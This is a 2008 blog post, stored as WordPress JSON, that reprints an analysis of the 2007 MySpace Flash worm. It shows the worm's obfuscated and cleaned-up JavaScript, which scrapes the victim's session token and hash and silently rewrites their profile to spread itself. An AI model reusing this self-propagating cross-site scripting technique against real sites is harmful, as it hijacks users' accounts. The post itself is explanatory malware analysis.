{"id":124,"date":"2008-01-02T15:02:15","date_gmt":"2008-01-02T19:02:15","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2008\/01\/02\/2007-myspace-hack-archive\/"},"modified":"2008-01-02T15:02:15","modified_gmt":"2008-01-02T19:02:15","slug":"2007-myspace-hack-archive","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2008\/01\/02\/2007-myspace-hack-archive\/","title":{"rendered":"2007 Myspace Hack Archive"},"content":{"rendered":"

archived just in case from [http:\/\/kinematictheory.phpnet.us\/]<\/p>\n

How the myspace SWF hack worked<\/p>\n

First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf’s, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I’ve probably got some bits wrong, feel free to contact me and I’ll update this page<\/p>\n

When you visited an already infected page, there was an SWF embedded (“redirect.swf”) which contained the actionscript:<\/p>\n

getURL(“http:\/\/editprofile.myspace.com\/index.cfm?fuseaction=blog.view&friendID=93634373&blogID=144877075”, “_self”);<\/p>\n

Which is pretty self explanatory – it opened the blog URL which you got redirected to.<\/p>\n

On the blog url which you got redirected to, there was another SWF embedded, called “retrievecookie.swf”. This contained:<\/p>\n


\n getURL(\"javas\\n\\rcript: var x = new ActiveXObject(\\'Msxml2.XMLHTTP\\');x.open(\\'GET\\',\\'http:\/\/editprofile.myspace.com\/index.cfm?fuseaction=user.HomeComments&friendID=93634373\\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\\'BX-\\')+3,pg.indexOf(\\'-EX\\'));while((sc.indexOf(\\'
\\')!=-1)||(sc.indexOf(\\'-XXX\\')!=-1)){var n=sc.indexOf(\\'
\\');if(n==-1)n=sc.indexOf(\\'-XXX\\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};\" + \"eval(sc);}};\" + \"x.send(null);\", \"\");
\n<\/code><\/p>\n

Which looks pretty obfuscated, however, when you space it out and add comments:<\/p>\n

<\/p>\n

getURL(\"
\n javas\\n\\r
\n cript:
\n \/\/this translates in the browser to: \"javascript:\"
\n \/\/which myspace really should have blocked now.
\n var x = new ActiveXObject(\\'Msxml2.XMLHTTP\\');
\n \/\/ loads a new xmlHTTP object, sets it as var \"x\"
\n x.open(\\'GET\\',\\'http:\/\/editprofile.myspace.com\/index.cfm?fuseaction=user.HomeComments&friendID=93634373\\',true);
\n \/\/ This opens yet another blog post, at the URL above. The text of the URL is below
\n x.onreadystatechange = function()
\n \/\/ when the readystate of the xmlHTTP object changes:
\n {
\n if (x.readyState==4)
\n \/\/ once the state changes to complete (it goes from 0 to 4, iirc)
\n {
\n var pg = x.responseText;
\n \/\/ the code it got from the page
\n var sc = pg.substring(pg.indexOf(\\'BX-\\')+3,pg.indexOf(\\'-EX\\'));
\n \/\/ loads into \"sc\" the contents of the response text from the place where
\n \/\/ the end of \"BX-\" (that's the +3) is first encountered up until it finds the start of
\n \/\/ \"-EX\", this is all the nasty JS.
\n while ( (sc.indexOf(\\'
\\')!=-1) || (sc.indexOf(\\'-XXX\\')!=-1) )
\n \/\/ while \"sc\" (the code) doesn't contain \"
\" or \"-XXX\" then:
\n {
\n var n=sc.indexOf(\\'
\\');
\n \/\/ n is the start of where it finds \"
\" in \"sc\"
\n if (n==-1)
\n n=sc.indexOf(\\'-XXX\\');
\n \/\/ if it cant find \"
, then make n where it can find \"-XXX\"<\/p>\n

\/\/ thist bit next was really quite clever, it manages to keep the > closing bracket for
\n \/\/ the embed tag, which it needs, and creates the embed tag by removing
\n \/\/ XXX's and leaving the final character!
\n sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
\n \/\/ sc is now from the start, to n.
\n \/\/ then add on to sc the bit from n+5 to the end of sc,
\n \/\/ essentially, this cuts out the crap from the blog post it pull.
\n \/\/ the crap was in there in the first place to get past myspace's filters, I presume.
\n };
\n \/\/ this iterates through and removes the -XXX's from the blog post
\n \" + \"eval(sc);
\n \/\/ evaluate \"sc\" - this is what does it all.
\n } \/\/ end of readystate==4 \"if\"
\n }; \/\/end of function
\n \" \/\/closing the quote from the SWF getURL() function
\n +
\n \"
\n x.send(null);
\n \/\/ adds on sending \"null\" to the xmlHTTP object.
\n \", \"\"
\n \/\/ no target, so it just executes.
\n );\/\/ end of SWF getURL function.
\n<\/code><\/p>\n

In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.<\/p>\n

This is the post:<\/p>\n


\n BX-var msg='-XXXX
\n XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src=\"http:\/\/i105.photobucket.com\/albums\/m225\/yrkblack\/redirect.swf\">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf('name=\"hash\" value=\"'); hash = page.substring(start+19, start+19+216); return hash;};var xmlht-XXXXtp = x;var post = new Array();post['submit']='Preview';post['interest']=msg;post['interestLabel']='aboutme';var postsz = paramsToString(post); var token = getToken(xmlhttp.responseText);xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');xmlhttp.open('POST', 'http:\/\/editprofile.myspace.com\/index.cfm?fuseaction=profile.previewInterests&Mytoken='+token, true);xmlhttp.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');xmlhttp.setRequestHeader('Content-Length', postsz.length);ev-XXXXal('xmlhttp.onreadys-XXXXtatechange=editReady;');xmlhttp.send(postsz);function editReady(){if (xmlhttp.readyState==4){post = new Array();post['submit']='Submit';post['hash']=getHashCode(xmlhttp.responseText);post['interest']=msg;post['interestLabel']='aboutme';postsz = paramsToString(post); token = getToken(xmlhttp.responseText); xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');xmlhttp.open('POST', 'http:\/\/editprofile.myspace.com\/\/index.cfm?fuseaction=profile.processInterests&Mytoken='+token, true);xmlhttp.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');xmlhttp.setRequestHeader('Content-Length', postsz.length);xmlhttp.send(postsz);}};-EX
\n<\/code><\/p>\n

Tidied up (and -XXX’s, etc) removed + commented:<\/p>\n


\n var msg='<EMBED src=\"http:\/\/i105.photobucket.com\/albums\/m225\/yrkblack\/redirect.swf\">BY SPAIRLKAIFS';
\n \/\/ the message itself.
\n function paramsToString (AV)
\n {
\n var N=new String();
\n var O=0;
\n for (var P in AV)
\n {
\n if (O>0)
\n {
\n N+='&'
\n \/\/ if it's not the first iteration, add \"&\" to the value, as to seperate the values.
\n }<\/p>\n

var Q=escape(AV[P]);<\/p>\n

while (Q.indexOf('+')!=-1)
\n {
\n Q=Q.replace('+', '%2B')
\n \/\/replaec \"+\" with \"%2B\" - url encoding basically
\n }
\n while (Q.indexOf('&')!=-1)
\n {
\n Q=Q.replace('&', '%26')
\n \/\/ same again, except for \"&\".
\n }
\n N+= P + '=' + Q;
\n O++
\n }
\n return N
\n };
\n \/\/ this turns a list of parameters in an array into a URL encoding string.<\/p>\n

function getToken (page)
\n {
\n var start = page.indexOf('Mytoken=');
\n token = page.substring(start+8, start+8+36);
\n return token;
\n };
\n \/\/ gets your token, since you're on myspace already, your token is (unfortunately) in the URL.. oops.<\/p>\n

function getHashCode (page)
\n {
\n var start = page.indexOf('name=\"hash\" value=\"');
\n hash = page.substring(start+19, start+19+216);
\n return hash;
\n };
\n \/\/ gets your hash code, which is supposed to be a security measure
\n \/\/ again, since you're on myspace.com - it's in the URL. Nice one myspace.<\/p>\n

var xmlhttp = x;
\n var post = new Array();
\n post['submit']='Preview';
\n post['interest']=msg;
\n post['interestLabel']='aboutme';
\n \/\/ loads the payload (the \"msg\" var), and other bits into an array called \"post\"
\n var postsz = paramsToString(post);
\n \/\/ from the functione arlier, turns the \"post\" array into a string.
\n var token = getToken(xmlhttp.responseText);
\n \/\/ gets your token
\n xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
\n \/\/ new xmlHTTp object.
\n xmlhttp.open('POST', 'http:\/\/editprofile.myspace.com\/index.cfm?fuseaction=profile.previewInterests&Mytoken='+token,true);
\n \/\/ opens the profile interest modifcation .. bit through a xmlHTTP object.<\/p>\n

xmlhttp.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');
\n \/\/ sends a HTTP header, which is that it's about to send a url encoded form.
\n xmlhttp.setRequestHeader('Content-Length', postsz.length);
\n eval('xmlhttp.onreadystatechange=editReady;');
\n \/\/ evaluates the function below when the readystate changes.
\n xmlhttp.send(postsz);
\n \/\/ sends it - which modifies your profile to include the contents of the msg var
\n function editReady()
\n {
\n if (xmlhttp.readyState==4)
\n {
\n post = new Array();
\n post['submit']='Submit';
\n post['hash']=getHashCode(xmlhttp.responseText);
\n post['interest']=msg;
\n post['interestLabel']='aboutme';
\n postsz = paramsToString(post);
\n token = getToken(xmlhttp.responseText);
\n xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
\n xmlhttp.open('POST','http:\/\/editprofile.myspace.com\/\/index.cfm?fuseaction=profile.processInterests&Mytoken='+token,true); xmlhttp.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');
\n xmlhttp.setRequestHeader('Content-Length', postsz.length);
\n xmlhttp.send(postsz);
\n }
\n };<\/p>\n

<\/code><\/p>\n

Which is then all evaluated by the first load of JS.<\/p>\n

So there you have it.<\/p>\n

Email me if you like: <\/p>\n

PS: To the author, that’s some clever code, nice one – I probably shouldn’t be congratulating you, but hey.<\/p>\n","protected":false},"excerpt":{"rendered":"

archived just in case from [http:\/\/kinematictheory.phpnet.us\/] How the myspace SWF hack worked First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf’s, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I’ve probably got some bits wrong, […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272],"tags":[],"class_list":["post-124","post","type-post","status-publish","format-standard","hentry","category-digital-warfare"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=124"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/124\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}